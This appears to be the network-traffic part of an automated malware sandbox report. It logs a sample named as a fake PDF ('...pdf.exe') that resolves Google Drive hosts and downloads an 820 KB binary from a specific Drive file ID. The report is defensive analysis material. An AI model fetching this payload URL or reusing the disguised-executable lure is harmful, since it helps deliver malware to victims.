Dec 19, 2024 07:58:02.336870909 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.337487936 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.338437080 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.338500977 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.338514090 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.351814032 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.351876020 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.351901054 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.352325916 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.352418900 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.352427006 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.353190899 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.353249073 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.353255033 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.356045008 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.356097937 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.356103897 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.356472969 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.356539011 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.356544018 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.358031988 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.358081102 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.358087063 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.382581949 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.382641077 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.382667065 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.383698940 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.383764029 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.383770943 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.384608030 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.384665012 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.384670973 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.385446072 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.385493994 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.385499954 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.386449099 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.386507988 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.386516094 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.387255907 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.387310982 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.387320995 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.391866922 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.391925097 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.391932964 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.392726898 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.392782927 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.392788887 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.393172026 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.393225908 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.393232107 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.399142027 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.399192095 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.399200916 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.400326967 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.400382996 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.400388956 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.400818110 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.400871992 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.400877953 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.409631968 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.409698963 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.409715891 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.410619020 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.410669088 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.410676003 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.417526960 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.417582035 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.417593002 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.417924881 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.417984962 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.417990923 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.418807983 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.418865919 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.418873072 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.425003052 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.425050974 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.425062895 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.425287962 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.425328970 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.425337076 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.426301956 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.426351070 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.426366091 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.440684080 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.440766096 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.440782070 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.440815926 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.440887928 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.440959930 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.441792965 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.441845894 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.441855907 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.453620911 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.453706980 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.453737020 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.454010010 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.454061985 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.454071045 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.454840899 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.454895020 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.454902887 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.469352961 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.469377995 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.469470024 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.469501019 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.469603062 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.469764948 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.470653057 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.470705986 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.470712900 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.496582985 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.496659994 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.496676922 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.496833086 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.496881008 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.496886969 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.497387886 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.497440100 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.497447014 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.505342007 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.505397081 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.505405903 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.505929947 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.505970001 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.505975008 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.506885052 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.506947041 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.506953955 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.521200895 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.521270037 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.521289110 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.521765947 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.521821022 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.521826982 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.522764921 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.522815943 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.522821903 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.528986931 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.529041052 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.529052019 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.529416084 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.529464006 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.529470921 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.530184984 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.530235052 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.530241966 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.544450045 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.544517040 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.544531107 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.544923067 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.544975996 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.544982910 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.545677900 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.545731068 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.545737982 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.548077106 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.548129082 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.548136950 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.548710108 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.548763037 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.548769951 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.549479008 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.549539089 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.549546003 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.585460901 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.585544109 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.585556030 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.585764885 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.585886002 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.585892916 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.587245941 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.587296009 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.587301970 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.587790966 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.587840080 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.587846041 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.588691950 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.588737011 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.588743925 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.590301037 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.590452909 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.590460062 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.593468904 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.593519926 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.593527079 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.593997955 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.594046116 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.594050884 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.594784975 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.594841003 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.594847918 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.596419096 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.596467018 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.596473932 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.597312927 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.597342014 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.597362041 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.597369909 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.597414970 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.598134995 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.601231098 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.601275921 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.601284027 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.601727009 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.601773977 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.601779938 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.603230953 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.603276014 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.603281975 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.609699965 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.609751940 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.609760046 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.610876083 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.610924959 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.610932112 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.611834049 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.611881018 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.611887932 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.617543936 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.617568970 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.617589951 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.617599964 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.617649078 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.618328094 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.619267941 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.619317055 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.619322062 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.632700920 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.632760048 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.632767916 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.633832932 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.633888960 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.633896112 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.634753942 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.634802103 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.634808064 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.646054029 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.646080017 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.646142960 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.646156073 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.646236897 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.646922112 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.647778034 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.647821903 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.647829056 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.664583921 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.664647102 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.664659977 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.665482998 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.665540934 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.665548086 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.687323093 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.687396049 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.687421083 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.687531948 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.687583923 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.687591076 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.688466072 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.688517094 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.688522100 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.689100027 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.689152002 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.689199924 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.689220905 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.689230919 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.689235926 CET	443	49712	172.217.17.65	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 07:57:53.112092972 CET	58817	53	192.168.2.6	1.1.1.1
Dec 19, 2024 07:57:53.251703024 CET	53	58817	1.1.1.1	192.168.2.6
Dec 19, 2024 07:57:55.968348026 CET	58686	53	192.168.2.6	1.1.1.1
Dec 19, 2024 07:57:56.109941959 CET	53	58686	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 19, 2024 07:57:53.112092972 CET	192.168.2.6	1.1.1.1	0x6b6	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 07:57:55.968348026 CET	192.168.2.6	1.1.1.1	0xe733	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 07:57:53.251703024 CET	1.1.1.1	192.168.2.6	0x6b6	No error (0)	drive.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 19, 2024 07:57:56.109941959 CET	1.1.1.1	192.168.2.6	0xe733	No error (0)	drive.usercontent.google.com		172.217.17.65	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	172.217.17.46	443	6620	C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 06:57:55 UTC	205	OUT	GET /uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: drive.google.com
2024-12-19 06:57:55 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 19 Dec 2024 06:57:55 GMT Location: https://drive.usercontent.google.com/download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-fINWvHNE6Jug_rVXbPZLdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49712	172.217.17.65	443	6620	C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 06:57:57 UTC	223	OUT	GET /download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=download HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: drive.usercontent.google.com
2024-12-19 06:58:01 UTC	4939	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC5oET2A_rN5GrWwFbqk0ImOpho4aLzaTIUSFIb_xeRC9RInXqqMStVSq3OrOdDmdYVEu53l2j8 Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="233_Cpbxcxnxwep" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 820528 Last-Modified: Wed, 18 Dec 2024 13:10:23 GMT Date: Thu, 19 Dec 2024 06:58:00 GMT Expires: Thu, 19 Dec 2024 06:58:00 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=ncw7Jg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
